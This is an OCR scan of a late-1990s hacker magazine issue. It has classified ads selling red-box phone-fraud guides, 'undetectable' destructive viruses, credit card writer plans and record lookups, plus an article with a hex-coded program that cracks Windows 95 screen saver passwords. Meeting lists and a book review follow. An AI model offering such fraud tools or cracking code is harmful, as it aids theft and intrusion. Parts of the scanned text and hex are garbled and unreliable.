neer, and Scientific Atlanta boxes only! 30 day 
money back guarantee on cable boxes! FREE 
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PHONE CALLS FOR LIFE! New video “How 
To Build a Red Box”. VHS 60 min. Complete 
step by step instructions on how to convert a Ra- 
dio Shack tone dialer (model 43-146) into a red 
box to obtain FREE calls from payphones. This 
video makes it easy. Magnification of circuit 
board gives a great detailed view of process. 
Other red boxing devices discussed as well: Hall- 
mark cards, digital recording watch, and more! 
This video will save you thousands of dollars 
every year. Best investment you'll ever make! 
New Year’s Sale price $9 US & $5 for shipping & 
handling. We sell 6.50 MHz crystals and UZI 
boxes too! COD available or send check or 
money order to: East America Company, Suite 
300H, 156 Sherwood Place, Englewood, NJ 
07631-3611. Tel: (201) 343-7017. Email: 76501. 
3071@compuserve.com. Free technical support! 
Mail order only! 

6.5536 MHZ CRYSTALS available in these 
quantities ONLY: 5 for $20, 10 for only $35, 25 
for $75, 50 for $125, 100 for $220, 200 for only 
$400 ($2 each). Crystals are POSTPAID. All or- 
ders from outside U.S. add $12 per order in U.S. 
funds. For other quantities, include phone num- 
ber and needs. E. Newman, 215-40 23rd Road, 
Bayside, NY 11360. 

NEW VERSION DSS TEST CARDS and re- 
programmed plastic access cards. Also cable TV 
replacement one piece converters in full test 
mode for all cable systems (I need to know the 
converter brand name and model number from 
the bottom of the converter). Ray Burgess, PO 
Box 99B65086, Pontiac, IL 61764-0099. 
UNDETECTABLE VIRUSES. Offering five 
viruses/viri which can automatically knock down 
DOS and Windows (3.1) operating systems at the 
victim’s command to open Windows. Easily 
loaded, recurrently destructive, and undetectable 
via all virus detection and cleaning programs 
with which I am familiar. Well-tested, relatively 
simple, and designed with stealth and victim be- 
havior in mind. Well-written documentation and 
antidote programs are included. Reasonably 
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priced - $10 even for TWO sets. They make great 
gifts! Money orders and checks preferred. Pro- 
vided on seven 1.44 MB, 3.5” floppy disks which 
can be freely copied. Mailed “priority” (USPO) 
along with instructions. Sorry, no foreign orders 
accepted. Satisfaction guaranteed or you have a 
bad attitude! The Omega Man, 8102 Furness 
Cove, Austin, TX 78753. 

CAP’N CRUNCH WHISTLES. Brand new, 
only a few left. THE ORIGINAL WHISTLE in 
mint condition, never used. Join the elite few 
who own this treasure! Once they are gone, that 
is it - there are no more! Keychain hole for 
keyring. Identify yourself at meetings, etc. as a 
2600 member by dangling your keychain and 
saying nothing. Cover one hole and get exactly 
2600 hz, cover the other hole and get another fre- 
quency. Use both holes to call your dog or dol- 
phin. Also, ideal for telephone remote control 
devices. Price includes mailing. $99.95. Not only 
a collector’s item but a VERY USEFUL device to 
carry at all times. Cash or money order only. 
Mail to: WHISTLE, P.O. Box 11562-ST, Clt, 
Missouri 63105. 

CREDIT CARD READER/WRITER that you 
can build at home. Interfaces with a home com- 
puter. For complete schematics and instructions 
send a check or m/o for $10 and a SASE to PBA 
Enterprises, P.O. Box 14257, Minneapolis, MN 
55414. 

DISAPPEARING INK formulas! Safely write 
the ultimate love letter or nasty note! Great gag 
item. Signed documents and memos will com- 
pletely and undetectably disappear in 1 day to 4 
weeks. Deterioration rate can be regulated. $5 
postpaid. Pete Haas, PO Box 702, Kent, Ohio 
44240-0013. 


Ee eee Services EE EE E E 


COMPUTER CRIME DEFENSE ATTOR- 
NEY: CIS degree with 10 years computer expe- 
rience. Dorsey Morrow, Jr. Contact at (334) 
265-6602 or visit www.cyhawk.com/cyberlaw. 

DATA INTELLIGENCE CORE. Providing 
FOIA documents and other related intelligence 
material to people. We can acquire contact infor- 
mation on a particular agency/supply you with 
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research material, and look up online services to 
find people, look up people’s credit records, 
DMV records, etc. PO. Box 23282, Tigard, OR 
97281. (503) 697-1031. Fax: (503) 636-6394. 
BUY, SELL, TRADE PUBLIC RECORDS! 
We buy, sell, and trade public records. Please call 
us at (916) 443-4822 or fax (916) 443-7420. We 
currently have many state’s records, mostly west 
coast, corporate/LTd’s, real estate, criminal and 
civil, fictitious business filings, resale permits, 
marriage, divorce, DMV, vehicles. 


uw w ae a Help Wanted mm mm ame oe 


NEED HELP TO CLEAR CREDIT. Please re- 
spond to B. Rice, Box 721, Annapolis, MD 21404. 


me aR ER Bulletin Boards EB EE EE 


ANARCHY ONLINE. A computer bulletin 
board resource for anarchists, survivalists, ad- 
venturers, investigators, researchers, computer 
hackers, and phone phreaks. Scheduled hacker 
chat meetings. Encrypted e-mail/file exchange. 
WWW - http://anarchy-online.com. Telnet: anar- 
chy-online.com. Modem: (214) 289-8328. 
FLUID BBS is a bulletin board system created 
for conversation. One line. Call and post mes- 
sages, download QWK packets, etc. No files, no 
doors (olg’s) and no stupid renegade mods. A 
simple board that you call up to talk to each other 
and log off. HPAVC related, somewhat. (303) 
460-9632. 


THE ANSWER IS NO! You CANNOT take 
out a classified ad in 2600 if you don’t sub- 
scribe! You cannot pay us any amount of 
money to advertize either here or elsewhere in 
the magazine. So please don’t ask - you proba- 
bly won’t even get a reply. If you do subscribe, 
you are entitled to a free ad in the Market- 
place as space and standards permit. Send 
your ad to: 2600 Marketplace, PO Box 99, 
Middle Island, NY 11953. Include your ad- 
dress label or photocopy. Deadline for Spring 
issue: 2/15/97. 
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While many may consider this a trivial 
exercise, cracking the password scheme for 
Win95 may be useful to some of you out 
there. Some may even find ways to have 
phun with it as well. 

To start with, you need to know where 
to look. In 3.1, the password was kept in the 
control.ini. Although 95 also uses the con- 
trol.ini, it does not use it for keeping the 
password information. For 95, you will 
have to look in each of the user.dat files. I 
say each because if you have multiple 
users, each user may have a profile saved on 
the hard drive. The default user.dat file is in 
the \windows directory. The other user.dat 
files can be found in the directory \pro- 
files\username where username changes. 
As you may know, user.dat is one of the two 
files used for the registry and it is very im- 
portant. User.dat will carry the attributes 
“shr” so you will have to look accordingly. 
Also, since it is so important, a backup of 
user.dat is kept, namely user.da0. This may 


by rdpzza 


cEATING HE yS .oAEEN® 


be the previous user.dat, say when the user 
changed passwords... 

Anyway, now that you have the file, 
where is it? If you scan the file for pass- 
word, you will come up with the setting of 
whether or not the screen saver is password 
protected. This may be enough for you so 
you can just change it and be done. While 
this little change will be noticed, it will get 
you by the password. If, however, you wish 
to actually find out what the pass phrase is, 
read on. 

Why find out what the pass phrase is, 
you ask? Because a lot of times users are 
stupid, lazy, have bad memory, or any com- 
bination of these and reuse passwords or 
schemes any time a key is needed. This is 
especially true in network environments and 
even more so when 95 is used as the work- 
station OS. In such systems, there is the 
possibility of changing the logon password 
and the screen saver password at the same 
time. I wonder how that can be useful? 

Back to finding out what the phrase is. 
95 has been rumored to use dual case. Let 
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me clear this rumor. It does not. It uses the 
“all upper” coding for the password like 
3.1. The maximum length of the screen 
saver password is 14 characters long. It will 
allow you to enter longer passwords, but 95 
will act screwy; it won’t require the pass- 
word from screen saver, it will hang, etc. 
OK, so we have the file. Look for the 
string “ScreenSaver_Data”. After this is an 
even string of numbers and letters ending in 
00. There is the encrypted pass phrase. The 
pass phrase is different from 3.1 in that 95 
uses what I call “encrypted-couplets” 
meaning that for every character in the 
phrase, there are two encryption values. 
The first encrypted couplet (EC) is the first 
hex digit of the unencrypted ascii value, 
and the second EC is the second hex digit. 
For example, say the first two hex digits af- 
ter the string “ScreenSaver_Data” are 31 41 
(1A in ASCII). The 31 represents (after de- 
cryption) 5 and the 41, 2. Put the digits to- 
gether and you have 52h, R in ASCII. Keep 
this concept in mind while decoding the 
EC’s because the decryption scheme is the 
same for each value, only the key changes. 
Refer to the sample program (left) that 


For those of you who would like a func- 
tioning program, use whichever debugger 
or editor to enter the following values. You 
can disassemble and modify it at will. Keep 
it free. 


BD 82 00 BE 38 01 3E 8A 
46 00 3E 8A 66 01 3C OD 
74 22 45 45 80 FC 40 72 
03 80 C4 09 3C 40 72 02 
04 09 25 OF OF B1 04 D2 
E0 02 C4 8A 24 46 30 EO 
CD 29 EB D2 B4 4C CD 21 
48 EE 76 1D 67 69 Al 1B 
7A 8C 47 F8 54 95 


File size: 70 


After you save it, you type in the en- 
crypted string in caps after the file name, 
i.e., crk95 (.com) 1AAA26473D28. It will 
type out the password on the next line, RD- 
PZZA in the example. I will make a fancier 
one when I have time and it will be free on 
the net, probably under the name crk95. 
com (I hope). 





` LA v 
shows the scheme. ooe’ oe @ o` 
Of course you will have to do the rest of | ) ee ( 
the program to get the final phrase, but I am 0 © 
giving the key values. ) 0 r ( 
Character Value ) : ol 
1 48h ) € 
2 ee 
3 76 ) ( 
4 1d 
5 67 ) E 
6 69 
7 al ) ( 
8 1b @ @ 
9 7a ra s e! 
10 8 
rei ves 0 o í 
6 0 e © 
a AF osto! 
14 95 L A A a e e a A @ € 
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Anarchy Online 

by Charles Platt 

$24.95, 365 pages, illustrated 
Published by Black Sheep Books 
Review by Scott Skinner 


Probably the last thing the world needs 
right now is YABOH (Yet Another Book On 
Hackers). After all, is there anything left in 
this genre that hasn’t already been ade- 
quately covered/exploited by such notewor- 
thies as The Cuckoo 5 Egg, Cyberpunk, The 
Hacker Crackdown, Masters of Deception, 
The Fugitive Game, Takedown, The Cy- 
berthief and the Samurai, and slues of other 
lesser known works? This question was 
foremost on my mind as I plowed through 
the first chapter of Charles Platt’s Anarchy 
Online, which begins with a tiresome recap 
of hacker ways and means. By the end of 
the book, I was happy I endured, for several 
elements combine to make Anarchy a 
unique and worthy read, and which allows 
me to answer my aforementioned question 
with a definitive yes. 

Whereas another recent publication, 
Katie Hafner and Matthew Lyon’s Where 
Wizards Stay Up Late: The Origins of the 
Internet, paints a vivid portrait of the Inter- 
net’s genesis, Anarchy picks up where Wiz- 
ards leaves off, discussing the complex 
social issues and corresponding power 
struggles contributing to the “anarchy” on- 
line. Anarchy, then, is very much aware of 
its predecessors, featuring and acknowledg- 
ing Katie Hafner and other authors as it ex- 
amines topics ranging from free speech 
issues to online pornography to digital cash. 
Indeed, perhaps the only common thread 
that ties these chapters together is their 
close relation to the Internet (with one note- 
worthy exception being its excellent exami- 
nation of satellite video piracy). In this 


HIGH TIDE ON BIG SUR 


respect, Platt breaks from the usual thematic 
literary approach and instead presents us 
with a second-order view rich in meta- 
content, a book about other books and is- 
sues relating to the Internet. This second or- 
der view allows Platt to make observations 
and judgments that are usually reserved for 
the critic. For example, examining not only 
the Kevin Mitnick saga, but the books writ- 
ten about Kevin, and the authors of those 
books, and the books written about those 
authors, etc. While Anarchy exercises hind- 
sight to the extreme, it also breaks some 
new ground, especially with its considera- 
tion and analysis of some of the most recent 
issues affecting netizens, including the In- 
ternet’s inevitable entrenchment into the 
world of commerce. 

Overall, Platt takes a positive approach 
toward the Internet, acknowledging its 
many problems (including hackers), but 
also putting those problems into perspec- 
tive. Anarchy, for example, points out that 
many “ex-hackers” from the past are now 
Internet Service Providers of the present, 
using their unique perspectives to secure 
free speech and online rights, in contrast to 
the extreme censorship that characterizes 
such conservative giants as AOL and Com- 
puserve. 

On the down side, Anarchy lacks both 
source notes and an index, both of which 
are of inestimable value for those of us hop- 
ing to find our names mentioned some- 
where in its pages. Additionally, I was 
disappointed that the story of Edward Cum- 
mings (a.k.a. Bernie S.) was not mentioned, 
as his ordeal is perhaps the clearest demon- 
stration yet of a chaotic and unfettered In- 
ternet nonetheless resulting in a powerful 
political gestalt capable of empowering in- 
dividuals and grass-roots efforts, and initi- 
ating change. 
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Legislators Prosecutors 
Thieves Christians 

Crackers Hackers Anarchists 
Supremacists Fetishists 
Scammers Spammers 


Cypherpunks ... and their 


Epic Struggle to Control 


the Internet 
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Anchorage, AK 
Diamond Center Food Court, smoking section, 
near payphones. 
Ann Arbor, Mi 
Galleria on South University. 
Atlanta 
Lennox Mall Food Court. 
Baltimore 
Baltimore Inner Harbor, Harborplace Food 
Court, Second Floor, across from the 
Newscenter. Payphone: (410) 547-9361. 
Baton Rouge, LA 
in The LSU Union Building, between the Tiger 
Pause and Swensen's Ice Cream, next to the 
payphones. Payphone numbers: (504) 387- 
9520, 9538, 9618, 9722, 9733, 9735. 
Bloomington, MN 
Mall of America, north side food court, across 
from Burger King and the bank of payphones 
that don’t take incoming calls. 
Boise, ID 
Student Union building at Boise State 
University near payphones. Payphone num- 
bers: (208) 342-9432, 9559, 9700, 9798. 
Boston 
Prudential Center Plaza, Terrace Food Court. 
Payphones: (617) 236-6582, 6583, 6584, 6585, 
try to bypass the carrier. 
Buffalo 
Eastern Hills Mall (Clarence) by lockers near 
food court. 
Charlotte, NC 
South Park Mall in the food court near the pay- 
phones. 
Chicago 
3rd Coast Cafe, 1260 North Dearborn. 
Cincinnati 
Kenwood Town Center, food court. 
Cleveland 
Coventry Arabica, Cleveland Heights, back 
room smoking section. 
Columbia, SC 
Richland Fashion Mall, 2nd level, food court, by 
the payphones in the smoking section. 6 pm. 
Columbus, OH 
Convention Center, lower level near the pay- 
phones. 
Dallas 
Mama's Pizza, northeast corner of Campbell 
Rd. and Preston Rd. in North Dallas, first floor 
of the two story strip section. 7 pm. Payphone: 
(214) 931-3850. 
Houston 
Food court under the stairs in Galleria 2, next to 
McDonalds. 
Kansas Clty 
Food court at the Oak Park Mall in Overland 
Park, Kansas. 
Los Angeles 
Union Station, corner of Macy & Alameda. 
inside main entrance by bank of phones. 
Payphones: (213) 972-9519, 9520; 625-9923, 
9924. 
Louisville, KY 
The Mall, St. Matthew's food court. 
Madison, WI 
Union South (227 S. Randall St.) on the main 
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level by the payphones. Payphone numbers: 
(608) 251-9746, 9914, 9916, 9923. 
Miami 
Dadeland Shopping Center in front of the 
Coffee Beanery by Victoria Station restaurant. 
Nashville 
Bean Central Cafe, intersection of West End 
Ave. and 29th Ave. S. three blocks west of 
Vanderbilt campus. 
New Orleans 
Food Court of Lakeside Shopping Center by 
Cafe du Monde. Payphones: (504) 835-8769, 
8778, and 8833 - good luck getting around the 
carrier. 





New York City 
Citicorp Center, in the lobby, near the pay- 
phones, 153 E 53rd St., between Lexington & 
3rd. 
Orlando, FL 
Fashion Square Mall in the food court between 
Hovan Gourmet & Panda Express. Payphones: 
(407) 895-5238, 7373, 4648; 896-9708; 895- 
6044, 6055. 
Ottawa, ONT (Canada) 
Cafe Wim on Sussex, a block down from 
Rideau Street. 7 pm. 
Philadelphia 
30th Street Amtrak Station at 30th & Market, 
under the “Stairwell 6" sign. Payphones: (215) 
222-9880, 9881, 9779, 9799, 9632; 387-9751. 
Phoenix 
Barnes and Noble by Metro Center. 
Pittsburgh 
Carnegie Mellon University student center in 
the lobby. 
Portland, ME 
Maine Mall by the bench at the food court door. 
Portland, OR 
Lloyd Center Mall, third level at the food court. 
Raleigh, NC 
Crabtree Valley Mall, food court. 
Reno, NV 
Meadow Wood Mall, Palms Food Court by 
Sbarro, 3-9 pm. 
Rochester, NY 
Marketplace Mall food court. 
St. Louis 
Galleria, Highway 40 and Brentwood, lower 
level, food court area, by the theaters. 
Sacramento 
Downtown Plaza food court, upstairs by the the- 
atre. Payphones: (916) 442-9543, 9644 - 
bypass the carrier. 
San Francisco 
4 Embarcadero Plaza (inside). Payphones: 
(415) 398-9803, 9804, 9805, 9806. 
Seattle 
Washington State Convention Center, first floor. 
Toronto, ONT (Canada) 
DotCom Cafe, 57 Duncan Street, just south- 
east of the Muchmusic building on Queen St. 
7 pm. 
Vancouver, BC (Canada) 
Pacific Centre Food Fair, one level down from 
street level by payphones, 4 pm to 9 pm. 
Washington DC 
Pentagon City Mall in the food court. 






AUSTRALIA, — 
EUROPE, ASIA, 
SOUTH AMERICA 





, _ Aberdeen, Scotland 
Outside, Marks & Spencers, next to the 
Grampian Transport kiosk. 
Adelaide, Australia 
Outside Cafe Celsius, near the Academy 
Cinema, on the corner of Grenfell and Pulteney 
Streets. 


Belo Horizonte, Brazil 
Pelego's Bar at Assufeng, near the payphone. 6 
pm. 
Buenos Aires, Argentina 

In the bar at San Jose 05. 

Bristol, England 
By the phones outside the 
Almshouse/Galleries, Merchant Street, 
Broadmead. Payphones: +44-117-9299011, 
9294437. 6:45 pm. 

Granada, Spain 
Ciberteca Granada in Pza. Einstein near the 
Campus de Fuentenueva. 

Haimstad, Sweden 
At the end of the town square (Stora Torget), to 
the right of the bakery (Tre Hjartan). At the pay- 
phones. 

London, England 
Trocadero Shopping Center (near Picadilly 
Circus) next to VR machines. 7 pm to 8pm. 

Manchester, England 
Cyberia Internet Cafe on Oxford Rd next to St. 
Peters Square. 6 pm. 

Melbourne, Australia 
Melbourne Central Shopping Centre at the 
Swanston Street entrance near the public 
phones. 

Munich, Germany 
Hauptbahnhof (Central Station), first floor, by 
Burger King and the payphones. (One stop on 
the S-Bahn from Hackerbruecke - 
Hackerbridge!) Birthplace of Hacker-Pschorr 
beer. Payphones: +49-89-591-835, +49-89- 
558-541, 542, 543, 544, 545. 

New Delhi, India 
Priya Cinema Complex, near the Allen Solly 
Showroom. 
Paris, France 
Place d'italie XIII, in front of the Grand Ecran 
Cinema. 6-7 pm. 
Rio de Janeiro, Brazil 
Rio Sul Shopping Center, Fun Club Night Club. 


All meetings take place on the first 
Friday of the month from approxi- 
mately 5 pm to 8 pm local time 
unless otherwise d. To starta 


(516) 751-2600 or sende 
meetings @ 2600.com. 








PLAN AHEAD 





NOW IS THE TIME TO PLAN FOR FUTURE EXPANSION. IF YOU 
SPEND A GREAT DEAL OF TIME IN FRONT OF COMPUTERS 
CONSUMING LARGE QUANTITIES OF JUNK FOOD, YOU YOURSELF 
WILL PROBABLY BE EXPANDING SOMETIME IN THE FUTURE. 
WHY WAIT? GET YOUR DOUBLE XTRA LARGE 2600 T-SHIRT 

TODAY AT OUR LOW 20TH CENTURY PRICES! 


I'M A TRADITIONALIST. SEND ME AN OLD-FASHIONED 
BLUE BOX SHIRT. MY SIZE IS: 


| WANT TO TRY SOMETHING NEW. SEND ME AN ELITE 
MICHELANGELO VIRUS SHIRT. MY SIZE IS: 


QO 1shirt/$15 OQ 2shirts/$26 


WAIT! I'M NOT FINISHED! SEND ME: 
INDIVIDUAL SUBSCRIPTION 
QO 1year/$21 O 2 years/$38 O 3 years/$54 


CORPORATE SUBSCRIPTION 
O 1year/$50 QO 2years/$90 O 3 years/$125 


OVERSEAS SUBSCRIPTION 
QO 1 year, individual/$30 O 1 year, corporate/$65 


LIFETIME SUBSCRIPTION l 
© $260 (you will get 2600 for as long as you can stand it) 
(also includes back issues from 1984, 1985, and 1986) 


BACK ISSUES (invaluable reference material) 
O 1984/$25 OQ 1985/$25 © 1986/$25 Q 1987/$25 
a 1988/$25 © 1989/$25 QO 1990/$25 QO 1991/$25 


a 1992/$25 O 1993/$25 QO 1994/$25 QO 1995/$25 
(OVERSEAS: ADD $5 PER YEAR OF BACK ISSUES) 


(individual back issues for 1988 to present are $6.25 each, $7.50 overseas) 


Send orders to: 2600, PO Box 752, Middle Island, NY 11953 
(Make sure you enclose your address!) 


TOTAL AMOUNT ENCLOSED: 
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